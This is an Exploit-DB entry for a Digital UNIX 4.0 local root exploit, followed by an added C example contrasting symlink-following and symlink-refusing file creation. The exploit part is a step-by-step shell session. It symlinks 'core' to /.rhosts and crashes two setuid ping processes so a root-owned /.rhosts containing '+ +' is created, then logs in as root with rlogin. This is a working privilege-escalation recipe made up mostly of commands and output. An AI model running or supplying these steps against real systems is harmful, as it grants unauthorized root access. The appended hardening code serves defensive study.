Exploit Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File

Exploiter

18 Dec 2022
EDB-ID: 19068
EDB Verified: Passed
Author: RU5TY & SOREN
Vulnerability type: LOCAL
Platform: UNIX
CVE: null
Publication date: 1998-04-06
Code:
source: https://www.securityfocus.com/bid/74/info

Digital UNIX 4.0 will follow symlinks while writing core files if two setuid programs dump core in succession. The core file is owned by root but with the user's group ID. The core file permissions are 0600. This can be used to create a root-owned file anywhere in the filesystem.

$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1] Segmentation fault /usr/sbin/ping somehost (core dumped)
[2] +Segmentation fault /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts
##/.rhosts has been created....that's all.##
$ rlogin localhost -l root
 
Source: www.exploit-db.com
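
The root cause described above is a privileged file writer that creates its output through a symlink. The following C sketch is an added example, not code from the original post, the advisory, or Digital UNIX; it contrasts a creation call that follows a dangling symlink with one that refuses it. The function names and the temporary directory are constructed for illustration, it assumes a modern POSIX system, and the `O_EXCL | O_NOFOLLOW` combination is shown as a general mitigation, not as the vendor's fix.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Naive dump writer (hypothetical name): O_CREAT alone follows a dangling
 * symlink and creates the link's target, the behaviour the page describes. */
static int open_dump_naive(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened writer (hypothetical name): O_EXCL fails on any existing name,
 * symlinks included; O_NOFOLLOW rejects a symlink as the final component. */
static int open_dump_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario in a private temp dir: "core" is a symlink to a
 * not-yet-existing "target". Returns 1 if the open created the target,
 * 0 if it did not, -1 on setup failure. */
int symlink_target_created(int use_safe)
{
    char dir[] = "/tmp/coredemoXXXXXX", link[64], target[64];
    struct stat st;
    int fd, created;

    if (!mkdtemp(dir)) return -1;
    snprintf(link, sizeof link, "%s/core", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, link) != 0) return -1;

    fd = use_safe ? open_dump_safe(link) : open_dump_naive(link);
    if (fd >= 0) close(fd);
    created = (stat(target, &st) == 0);

    unlink(target); unlink(link); rmdir(dir);   /* clean up the sandbox */
    return created;
}

int main(void)
{
    printf("naive open created target: %d\n", symlink_target_created(0));
    printf("safe open created target:  %d\n", symlink_target_created(1));
    return 0;
}
```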